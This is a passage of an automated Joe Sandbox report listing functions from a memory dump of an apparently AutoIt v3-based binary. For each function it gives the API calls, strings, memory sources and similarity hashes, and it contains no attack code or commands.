Function 006EBF80 Relevance: 12.5, APIs: 5, Strings: 2, Instructions: 264
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_memset.LIBCMT ref: 006EBFD4
VariantInit.OLEAUT32(?), ref: 006EC0A5
VariantInit.OLEAUT32(?), ref: 006EC1A6
VariantClear.OLEAUT32(?), ref: 006EC1B0
VariantClear.OLEAUT32(?), ref: 006EC211

Strings

Incorrect Object type in FOR..IN loop, xrefs: 006EC189
Null Object assignment in FOR..IN loop, xrefs: 006EC035, 006EC163, 006EC21F

Memory Dump Source

Source File: 0000002E.00000002.2538130152.0000000000691000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00690000, based on PE: true

Associated: 0000002E.00000002.2537950289.0000000000690000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000073E000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000074A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000076A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.00000000007F2000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539425168.00000000007F8000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539701464.00000000007F9000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_46_2_690000_UNK_.jbxd

Similarity

API ID: Variant$ClearInit$_memset
String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
API String ID: 2862541840-625585964
Opcode ID: 010101f8a94322d572bbdfe83bd75ea84bc9add57f231021bd41ae45d76eb314
Instruction ID: 1d7d0ec0bae9a397af75ead75b216f35f88c3aea604338e9f8a9792d9b6b36ce
Opcode Fuzzy Hash: 010101f8a94322d572bbdfe83bd75ea84bc9add57f231021bd41ae45d76eb314
Instruction Fuzzy Hash: 4C919F71A01355EFDB24CFAAC844FEEB7B9AF45720F108119F915AB281D7709A46CFA0

Function 00693DCB Relevance: 10.8, APIs: 2, Strings: 4, Instructions: 258COMMON

Download Yara Rule

APIs

Part of subcall function 00693F9B: LoadLibraryExW.KERNEL32(00000001,00000000,00000002,?,?,?,?,006934E2,?,00000001), ref: 00693FCD

_free.LIBCMT ref: 00703C27
_free.LIBCMT ref: 00703C6E

Part of subcall function 0069BDF0: GetCurrentDirectoryW.KERNEL32(00000104,?,?,00002000,?,007522E8,?,00000000,?,00693E2E,?,00000000,?,0072DBF0,00000000,?), ref: 0069BE8B
Part of subcall function 0069BDF0: GetFullPathNameW.KERNEL32(?,00000104,?,?,?,00693E2E,?,00000000,?,0072DBF0,00000000,?,00000002), ref: 0069BEA7
Part of subcall function 0069BDF0: __wsplitpath.LIBCMT ref: 0069BF19
Part of subcall function 0069BDF0: _wcscpy.LIBCMT ref: 0069BF31
Part of subcall function 0069BDF0: _wcscat.LIBCMT ref: 0069BF46
Part of subcall function 0069BDF0: SetCurrentDirectoryW.KERNEL32(?), ref: 0069BF56

Strings

Bad directive syntax error, xrefs: 00703C54
>>>AUTOIT SCRIPT<<<, xrefs: 00703A01
E<i, xrefs: 00703B58
G-i, xrefs: 00703A4F

Memory Dump Source

Source File: 0000002E.00000002.2538130152.0000000000691000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00690000, based on PE: true

Associated: 0000002E.00000002.2537950289.0000000000690000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000073E000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000074A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000076A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.00000000007F2000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539425168.00000000007F8000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539701464.00000000007F9000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_46_2_690000_UNK_.jbxd

Similarity

API ID: CurrentDirectory_free$FullLibraryLoadNamePath__wsplitpath_wcscat_wcscpy
String ID: >>>AUTOIT SCRIPT<<<$Bad directive syntax error$E<i$G-i
API String ID: 1510338132-3264748378
Opcode ID: 49f91b0f84b9bd61437711b8b0ec2a3e28c1772f3034507dce29261505a978a3
Instruction ID: 74832990431edb89843e91e8f9a5b6efc5f6637c047f7cb50e71e680acc462d1
Opcode Fuzzy Hash: 49f91b0f84b9bd61437711b8b0ec2a3e28c1772f3034507dce29261505a978a3
Instruction Fuzzy Hash: F6915DB1A10229EFCF04EFA4DC919EEB7B9BF05314F10452AF416AB291DB349A45CB54

Function 006AEB05 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 73registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.KERNEL32(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,00000000,?,006AEADA,?,?), ref: 006AEB27
RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?,?,006AEADA,?,?), ref: 00704B26
RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000,?,?,006AEADA,?,?), ref: 00704B65
RegCloseKey.ADVAPI32(?,?,006AEADA,?,?), ref: 00704B94

Strings

Software\AutoIt v3\AutoIt, xrefs: 006AEB1D
Include, xrefs: 00704B1E, 00704B5D

Memory Dump Source

Source File: 0000002E.00000002.2538130152.0000000000691000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00690000, based on PE: true

Associated: 0000002E.00000002.2537950289.0000000000690000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000073E000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000074A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000076A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.00000000007F2000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539425168.00000000007F8000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539701464.00000000007F9000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_46_2_690000_UNK_.jbxd

Similarity

API ID: QueryValue$CloseOpen
String ID: Include$Software\AutoIt v3\AutoIt
API String ID: 1586453840-614718249
Opcode ID: 6366978107d996bd24969e1912e65ddde91e0e040c8d32546dd35fb77a7107c4
Instruction ID: 301f45f67db20099142221c0e0dc136a3bfcceb2ac21cf0b793d3352bce3ebd3
Opcode Fuzzy Hash: 6366978107d996bd24969e1912e65ddde91e0e040c8d32546dd35fb77a7107c4
Instruction Fuzzy Hash: 45117CB1600118BEEF14EBA8DD86EFE77BDEF04354F004059B506E20A0EA749E41DB64

Function 00692E9D Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 44COMMON

Download Yara Rule

APIs

CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00692ECB
CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00692EEC
ShowWindow.USER32(00000000), ref: 00692F00
ShowWindow.USER32(00000000), ref: 00692F09

Strings

AutoIt v3, xrefs: 00692EC3, 00692EC8, 00692EC9
edit, xrefs: 00692EE6

Memory Dump Source

Source File: 0000002E.00000002.2538130152.0000000000691000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00690000, based on PE: true

Associated: 0000002E.00000002.2537950289.0000000000690000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000073E000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000074A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000076A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.00000000007F2000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539425168.00000000007F8000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539701464.00000000007F9000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_46_2_690000_UNK_.jbxd

Similarity

API ID: Window$CreateShow
String ID: AutoIt v3$edit
API String ID: 1584632944-3779509399
Opcode ID: 4632545804bfb67a09a54c3d3017ef3a251f3d5dcecc4076c52855de0fe32045
Instruction ID: 786705a7877abfb8fc48d6584e977a7c6cf78af4a9b98f71f5dc3ec4e60b371e
Opcode Fuzzy Hash: 4632545804bfb67a09a54c3d3017ef3a251f3d5dcecc4076c52855de0fe32045
Instruction Fuzzy Hash: AEF03A70A403E47AE7315767AC08FA72E7DD7C6F22F41C11EBA08A21E0C1A90C81CAB4

Function 006B87D7 Relevance: 9.0, APIs: 6, Instructions: 45threadCOMMON

Download Yara Rule

APIs

__init_pointers.LIBCMT ref: 006B87D7

Part of subcall function 006B1E5A: __initp_misc_winsig.LIBCMT ref: 006B1E7E
Part of subcall function 006B1E5A: GetModuleHandleW.KERNEL32(kernel32.dll), ref: 006B8BE1
Part of subcall function 006B1E5A: GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 006B8BF5
Part of subcall function 006B1E5A: GetProcAddress.KERNEL32(00000000,FlsFree), ref: 006B8C08
Part of subcall function 006B1E5A: GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 006B8C1B
Part of subcall function 006B1E5A: GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 006B8C2E
Part of subcall function 006B1E5A: GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 006B8C41
Part of subcall function 006B1E5A: GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 006B8C54
Part of subcall function 006B1E5A: GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 006B8C67
Part of subcall function 006B1E5A: GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 006B8C7A
Part of subcall function 006B1E5A: GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 006B8C8D
Part of subcall function 006B1E5A: GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 006B8CA0
Part of subcall function 006B1E5A: GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 006B8CB3
Part of subcall function 006B1E5A: GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 006B8CC6
Part of subcall function 006B1E5A: GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 006B8CD9
Part of subcall function 006B1E5A: GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 006B8CEC
Part of subcall function 006B1E5A: GetProcAddress.KERNEL32(00000000,FlushProcessWriteBuffers), ref: 006B8CFF

__mtinitlocks.LIBCMT ref: 006B87DC

Part of subcall function 006B8AB3: InitializeCriticalSectionAndSpinCount.KERNEL32(0074AC68,00000FA0,?,?,006B87E1,006B6AFA,007467D8,00000014), ref: 006B8AD1

__mtterm.LIBCMT ref: 006B87E5

Part of subcall function 006B884D: RtlDeleteCriticalSection.NTDLL(00000000), ref: 006B89CF
Part of subcall function 006B884D: _free.LIBCMT ref: 006B89D6
Part of subcall function 006B884D: RtlDeleteCriticalSection.NTDLL(0074AC68), ref: 006B89F8

__calloc_crt.LIBCMT ref: 006B880A
GetCurrentThreadId.KERNEL32 ref: 006B8833

Memory Dump Source

Source File: 0000002E.00000002.2538130152.0000000000691000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00690000, based on PE: true

Associated: 0000002E.00000002.2537950289.0000000000690000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000073E000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000074A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000076A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.00000000007F2000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539425168.00000000007F8000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539701464.00000000007F9000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_46_2_690000_UNK_.jbxd

Similarity

API ID: AddressProc$CriticalSection$Delete$CountCurrentHandleInitializeModuleSpinThread__calloc_crt__init_pointers__initp_misc_winsig__mtinitlocks__mtterm_free
String ID:
API String ID: 2942034483-0
Opcode ID: 4f14b366e05cc16cdd2019a0660cc5c60b49a1790bb70eb25a71e7c00f72034c
Instruction ID: adf3a7e86c2e9dad45bca7e08e6f5e1044fef2bf9654470ed707b33bca69afc8
Opcode Fuzzy Hash: 4f14b366e05cc16cdd2019a0660cc5c60b49a1790bb70eb25a71e7c00f72034c
Instruction Fuzzy Hash: 34F049B21197516EE2A47A38BC06ADA26CE8B42734B654A2EF464D71D2FF1488C1C368

Function 006D6D6D Relevance: 7.6, APIs: 5, Instructions: 79COMMON

Download Yara Rule

APIs

Part of subcall function 00693B1E: _wcsncpy.LIBCMT ref: 00693B32

GetFileAttributesW.KERNEL32(?,?,00000000), ref: 006D6DBA
GetLastError.KERNEL32 ref: 006D6DC5
CreateDirectoryW.KERNEL32(?,00000000), ref: 006D6DD9
_wcsrchr.LIBCMT ref: 006D6DFB

Part of subcall function 006D6D6D: CreateDirectoryW.KERNEL32(?,00000000), ref: 006D6E31

Memory Dump Source

Source File: 0000002E.00000002.2538130152.0000000000691000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00690000, based on PE: true

Associated: 0000002E.00000002.2537950289.0000000000690000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000073E000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000074A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000076A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.00000000007F2000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539425168.00000000007F8000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539701464.00000000007F9000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_46_2_690000_UNK_.jbxd

Similarity

API ID: CreateDirectory$AttributesErrorFileLast_wcsncpy_wcsrchr
String ID:
API String ID: 3633006590-0
Opcode ID: 84b006ea0e2a38b0fa0f21777c8d3d4c91b2a09512a020da4d31b719c00d13a9
Instruction ID: 487e3a038a8efe8ca0cb2b63a3c589368c81cc0955d1d7d5e4dbf64e66ed88e6
Opcode Fuzzy Hash: 84b006ea0e2a38b0fa0f21777c8d3d4c91b2a09512a020da4d31b719c00d13a9
Instruction Fuzzy Hash: FA21F375A043189ADF2067B8EC4AAEA73AF9F05310F20455BF021C33D2EB64DE849A58

Function 006E9122 Relevance: 7.6, APIs: 5, Instructions: 71networkCOMMON

Download Yara Rule

APIs

Part of subcall function 006EACD3: inet_addr.WS2_32(00000000), ref: 006EACF5

socket.WS2_32(00000002,00000001,00000006,?,?,00000000), ref: 006E9160
WSAGetLastError.WS2_32(00000000), ref: 006E916F
connect.WS2_32(00000000,?,00000010), ref: 006E918B

Memory Dump Source

Source File: 0000002E.00000002.2538130152.0000000000691000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00690000, based on PE: true

Associated: 0000002E.00000002.2537950289.0000000000690000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000073E000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000074A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000076A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.00000000007F2000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539425168.00000000007F8000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539701464.00000000007F9000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_46_2_690000_UNK_.jbxd

Similarity

API ID: ErrorLastconnectinet_addrsocket
String ID:
API String ID: 3701255441-0
Opcode ID: 72dc310b0f5b9eaa22c755f64b8ad6ab8782c0b09cac0676d86448f4a3e1c1ca
Instruction ID: b23f521fe91cc0cb42a58262fd9df6baeb6af20d391f14665392cf14acc46a36
Opcode Fuzzy Hash: 72dc310b0f5b9eaa22c755f64b8ad6ab8782c0b09cac0676d86448f4a3e1c1ca
Instruction Fuzzy Hash: 44218C316002119FDB10AF68CC99BAE77AEAF49724F04845DF916AB3D2DA74EC018B65

Function 006EF79F Relevance: 7.4, APIs: 3, Strings: 1, Instructions: 385COMMON

Download Yara Rule

Strings

dEt, xrefs: 006EF865

Memory Dump Source

Source File: 0000002E.00000002.2538130152.0000000000691000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00690000, based on PE: true

Associated: 0000002E.00000002.2537950289.0000000000690000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000073E000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000074A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000076A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.00000000007F2000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539425168.00000000007F8000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539701464.00000000007F9000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_46_2_690000_UNK_.jbxd

Similarity

API ID:
String ID: dEt
API String ID: 0-1794749579
Opcode ID: 107787d6be3a8108d7f94df2201b53be337bc9f9392ec4884da1781c2896f019
Instruction ID: 6fdb803f05e80ec1313acc4cc8667871309523edb148448ab0b1c1cdec9bfc3c
Opcode Fuzzy Hash: 107787d6be3a8108d7f94df2201b53be337bc9f9392ec4884da1781c2896f019
Instruction Fuzzy Hash: D7F16A71A043419FCB50DF29C580B5AB7E6BF88714F10896EF9998B392D731E905CF82

Function 00693A67 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 78COMMON

Download Yara Rule

APIs

SHGetMalloc.SHELL32(1<i), ref: 00693A7D
SHGetPathFromIDListW.SHELL32(?,?), ref: 00693AD2
SHGetDesktopFolder.SHELL32(?), ref: 00693A8F

Part of subcall function 00693B1E: _wcsncpy.LIBCMT ref: 00693B32

Strings

1<i, xrefs: 00693A70, 00693B06, 00693AF1, 00693A76, 00693AF9, 00693B09

Memory Dump Source

Source File: 0000002E.00000002.2538130152.0000000000691000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00690000, based on PE: true

Associated: 0000002E.00000002.2537950289.0000000000690000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000073E000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000074A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000076A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.00000000007F2000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539425168.00000000007F8000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539701464.00000000007F9000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_46_2_690000_UNK_.jbxd

Similarity

API ID: DesktopFolderFromListMallocPath_wcsncpy
String ID: 1<i
API String ID: 3981382179-2641753782
Opcode ID: b2ac9eed0ea4fcdc3916329844f0c6e0801f7fddeea6eef3b371ede731f672c4
Instruction ID: 761539a573690a2673e20a243ad0e6516f1a1ceaa4be2c08d0d39d90577f78b4
Opcode Fuzzy Hash: b2ac9eed0ea4fcdc3916329844f0c6e0801f7fddeea6eef3b371ede731f672c4
Instruction Fuzzy Hash: 23215376B00114ABCB24DF95DC84DEE77BEEF88700B108098F909D7255DB309E46CB94

Function 006AC955 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 58registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.KERNEL32(80000001,Control Panel\Mouse,00000000,00000001,00000000,00000003,00000000,80000001,80000001,?,006AC948,SwapMouseButtons,00000004,?), ref: 006AC979
RegQueryValueExW.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,006AC948,SwapMouseButtons,00000004,?,?,?,?,006ABF22), ref: 006AC99A
RegCloseKey.KERNEL32(00000000,?,?,006AC948,SwapMouseButtons,00000004,?,?,?,?,006ABF22), ref: 006AC9BC

Strings

Control Panel\Mouse, xrefs: 006AC977

Memory Dump Source

Source File: 0000002E.00000002.2538130152.0000000000691000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00690000, based on PE: true

Associated: 0000002E.00000002.2537950289.0000000000690000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000073E000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000074A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000076A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.00000000007F2000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539425168.00000000007F8000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539701464.00000000007F9000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_46_2_690000_UNK_.jbxd

Similarity

API ID: CloseOpenQueryValue
String ID: Control Panel\Mouse
API String ID: 3677997916-824357125
Opcode ID: 591d06f6fa8b209a47603c6ef22e0ff3624a4a32bddee8e7d53de94b50c62bb0
Instruction ID: 5b63d2a19188e08a8b79cafa50da324a99fe3aa7649ce616fdf2f38891405695
Opcode Fuzzy Hash: 591d06f6fa8b209a47603c6ef22e0ff3624a4a32bddee8e7d53de94b50c62bb0
Instruction Fuzzy Hash: 66117C75511208FFDB219F64DC44EEF77B9EF09750F00845AB841E7210E231AE419B64

Function 006CA8C8 Relevance: 6.3, APIs: 4, Instructions: 306COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000002E.00000002.2538130152.0000000000691000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00690000, based on PE: true

Associated: 0000002E.00000002.2537950289.0000000000690000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000073E000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000074A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000076A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.00000000007F2000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539425168.00000000007F8000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539701464.00000000007F9000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_46_2_690000_UNK_.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e9e7c6cb545a1ff04dc18d78587895754ec5a26dd822e4dfde4af9163f78415e
Instruction ID: add8395567dc0e11d0971dbefe4035a6f093908ae5b7a3b28620ffad3170e02e
Opcode Fuzzy Hash: e9e7c6cb545a1ff04dc18d78587895754ec5a26dd822e4dfde4af9163f78415e
Instruction Fuzzy Hash: 6BC11775A0021AABCB14CFE4C994FBAB7B6FF48708F10859DE905AB251D730DE41CBA5

Function 0069131C Relevance: 6.2, APIs: 3, Strings: 1, Instructions: 159COMMON

Download Yara Rule

APIs

Part of subcall function 006916F2: RegisterClipboardFormatW.USER32(WM_GETCONTROLNAME), ref: 00691751

GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 0069159B
CoInitialize.OLE32(00000000), ref: 00691612
CloseHandle.KERNEL32(00000000), ref: 007058F7

Strings

'/m, xrefs: 00691406, 00691450, 0069146C

Memory Dump Source

Source File: 0000002E.00000002.2538130152.0000000000691000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00690000, based on PE: true

Associated: 0000002E.00000002.2537950289.0000000000690000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000073E000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000074A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000076A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.00000000007F2000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539425168.00000000007F8000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539701464.00000000007F9000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_46_2_690000_UNK_.jbxd

Similarity

API ID: Handle$ClipboardCloseFormatInitializeRegister
String ID: '/m
API String ID: 458326420-3814501631
Opcode ID: 9dcd133b4091aa52c42418567a27867e19da31602006655d64712c2e06c2d256
Instruction ID: c37f24a24bb84ce4ca3deaff0ac48d020f7fbe31afb62e91a51e07e539b988af
Opcode Fuzzy Hash: 9dcd133b4091aa52c42418567a27867e19da31602006655d64712c2e06c2d256
Instruction Fuzzy Hash: E671CCB49013858AC750DF6AA8A06D4BBA9F7493473D4EA7ED00A87761DBFC4844CF1D

Function 006DCC82 Relevance: 6.2, APIs: 4, Instructions: 154COMMON

Download Yara Rule

APIs

Part of subcall function 006941A7: _fseek.LIBCMT ref: 006941BF

Part of subcall function 006DCE59: _wcscmp.LIBCMT ref: 006DCF49
Part of subcall function 006DCE59: _wcscmp.LIBCMT ref: 006DCF5C

_free.LIBCMT ref: 006DCDC9
_free.LIBCMT ref: 006DCDD0
_free.LIBCMT ref: 006DCE3B

Part of subcall function 006B28CA: RtlFreeHeap.NTDLL(00000000,00000000,?,006B8715,00000000,006B88A3,006B4673,?), ref: 006B28DE
Part of subcall function 006B28CA: GetLastError.KERNEL32(00000000,?,006B8715,00000000,006B88A3,006B4673,?), ref: 006B28F0

_free.LIBCMT ref: 006DCE43

Memory Dump Source

Source File: 0000002E.00000002.2538130152.0000000000691000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00690000, based on PE: true

Associated: 0000002E.00000002.2537950289.0000000000690000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000073E000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000074A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000076A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.00000000007F2000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539425168.00000000007F8000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539701464.00000000007F9000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_46_2_690000_UNK_.jbxd

Similarity

API ID: _free$_wcscmp$ErrorFreeHeapLast_fseek
String ID:
API String ID: 1552873950-0
Opcode ID: 3bbf84d6b84c5ccb4406d7a14d13c4f849fbec825050499589f31b9b6ee91132
Instruction ID: 73d7792a094764bfe59ffc0a10a8264ee1afd94795e152bb8e5a95a2d51dab06
Opcode Fuzzy Hash: 3bbf84d6b84c5ccb4406d7a14d13c4f849fbec825050499589f31b9b6ee91132
Instruction Fuzzy Hash: C7514CB1D04219AFDF559F64CC81AAEBBBAEF48310F1040AEF619A3351DB715A80CF59

Function 00691E58 Relevance: 6.1, APIs: 4, Instructions: 65timewindowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00691E87

Part of subcall function 006938E4: _memset.LIBCMT ref: 00693965
Part of subcall function 006938E4: _wcscpy.LIBCMT ref: 006939B5
Part of subcall function 006938E4: Shell_NotifyIconW.SHELL32(00000001,?), ref: 006939C6

KillTimer.USER32(?,00000001), ref: 00691EDC
SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00691EEB
Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00704526

Memory Dump Source

Source File: 0000002E.00000002.2538130152.0000000000691000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00690000, based on PE: true

Associated: 0000002E.00000002.2537950289.0000000000690000.00000002.00000001.01000000.0000000B.sdmpDownload File
